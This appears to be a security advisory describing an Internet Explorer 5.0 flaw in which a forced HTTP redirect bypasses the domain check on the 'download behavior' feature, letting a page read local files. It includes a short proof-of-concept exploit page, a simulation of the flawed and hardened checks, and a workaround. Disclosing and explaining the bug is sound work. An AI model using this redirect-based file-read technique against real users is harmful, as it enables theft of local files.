Description:
Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (Windows 98 is
presumably vulnerable as well) allows a web page to read local text files
(the extension does not matter) and parts of binary files.
It is also possible to read text files from any domain and, in some cases,
to read files from a web server behind a firewall.
Details:
The problem is the IE feature "download behavior".
A link can be given this behavior so that a callback function is executed
when the link is clicked.
When the "startDownload" method invokes the callback function, the contents
of the downloaded file are passed to it as an argument.
Microsoft has implemented a security check which does not allow downloading
files in this way from a different domain.
But if the link points to a file in the same domain as the exploit page and
an HTTP redirect is forced, then the exploit works: the domain check is
evidently applied to the requested URL rather than to the redirect target,
so a redirect to a file: URL hands the local file to the callback.
It is not necessary for the user to click on the link; this may be done
automatically from script.
This vulnerability may be exploited using an HTML email message or a
newsgroup posting.
The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
function doit(s)
{
  alert ("Here is your file:\n"+s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)"
   HREF="javascript:oD.startDownload('http://www.guninski.com/reject.cgi?autoexec', doit)">Click here to read C:\AUTOEXEC.BAT</A>.
----------------------------------------------------------------------------------------
("http://www.guninski.com/reject.cgi?autoexec" just does a HTTP redirect
to file://c:/autoexec.bat)
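The following is an added example, not code from the advisory: it models the domain check that the text says IE 5.0 applied to startDownload() and shows why a redirect defeats it. The "network" is a constructed table mapping the reject.cgi URL to file:///c:/autoexec.bat, the AUTOEXEC.BAT contents are made up, and the page URL http://www.guninski.com/exploit.html is an assumption. The flawed policy checks only the URL passed to startDownload(); the hardened policy checks every hop of the redirect chain and refuses non-HTTP schemes outright.

```javascript
// Added example (not Guninski's code). Models the same-origin check described
// in the advisory and why an HTTP redirect bypasses it. All URLs, the redirect
// table and the file contents below are constructed for the demonstration.

// Constructed stand-in for the network: the exploit page's own host answers
// one path with a redirect to a local file.
const REDIRECTS = {
  "http://www.guninski.com/reject.cgi?autoexec": "file:///c:/autoexec.bat",
};
// Constructed stand-in for the victim's local disk.
const LOCAL_FILES = {
  "file:///c:/autoexec.bat": "@ECHO OFF\r\nPATH C:\\WINDOWS;C:\\WINDOWS\\COMMAND\r\n",
};

// Same scheme and host. Uses the global WHATWG URL class available in Node.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.host === ub.host;
}

// Follows redirects one hop at a time. `check(url, hopIndex)` is consulted
// before each hop is fetched and returns null (allow) or a reason (block).
function download(target, check, maxHops = 5) {
  let current = target;
  for (let hop = 0; hop <= maxHops; hop++) {
    const reason = check(current, hop);
    if (reason) return { ok: false, reason, url: current };
    if (current in REDIRECTS) {
      current = REDIRECTS[current]; // server said 302: go to the new location
      continue;
    }
    const body = current in LOCAL_FILES ? LOCAL_FILES[current] : null;
    return { ok: true, body, url: current };
  }
  return { ok: false, reason: "too many redirects", url: current };
}

// Flawed policy (the behaviour the advisory describes): the domain is compared
// only for the URL handed to startDownload(), i.e. hop 0. Whatever the redirect
// points at, including file:, is fetched without a further check.
function flawedPolicy(pageUrl) {
  return (url, hop) => (hop === 0 && !sameOrigin(pageUrl, url) ? "cross-domain" : null);
}

// Hardened policy: every hop, including the final one, must be an HTTP(S) URL on
// the page's own origin. A redirect to file: or to another host is refused.
function strictPolicy(pageUrl) {
  return (url) => {
    const proto = new URL(url).protocol;
    if (proto !== "http:" && proto !== "https:") return `scheme ${proto} not allowed`;
    if (!sameOrigin(pageUrl, url)) return `cross-domain hop ${url}`;
    return null;
  };
}

// Runs the advisory's scenario: a same-domain link that redirects to a local
// file, under both policies, plus a direct file: request that even the flawed
// check blocks (which is why the redirect is needed).
function demo() {
  const page = "http://www.guninski.com/exploit.html";   // assumed exploit page
  const target = "http://www.guninski.com/reject.cgi?autoexec";
  return {
    flawed: download(target, flawedPolicy(page)),
    strict: download(target, strictPolicy(page)),
    direct: download("file:///c:/autoexec.bat", flawedPolicy(page)),
  };
}

for (const [name, r] of Object.entries(demo())) {
  console.log(name + ":", r.ok ? "file read from " + r.url + "\n" + r.body : "blocked (" + r.reason + ")");
}
```

Under the flawed policy the redirect lands on file:///c:/autoexec.bat and the contents come back, exactly as the alert() in the exploit shows; under the strict policy the same request is refused at the second hop. The general lesson is that an origin or scheme check must be re-applied to every URL a fetch actually visits, not only to the URL that was requested.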
Workaround:
Disable Active Scripting
Demonstration:
Click here to read C:\AUTOEXEC.BAT.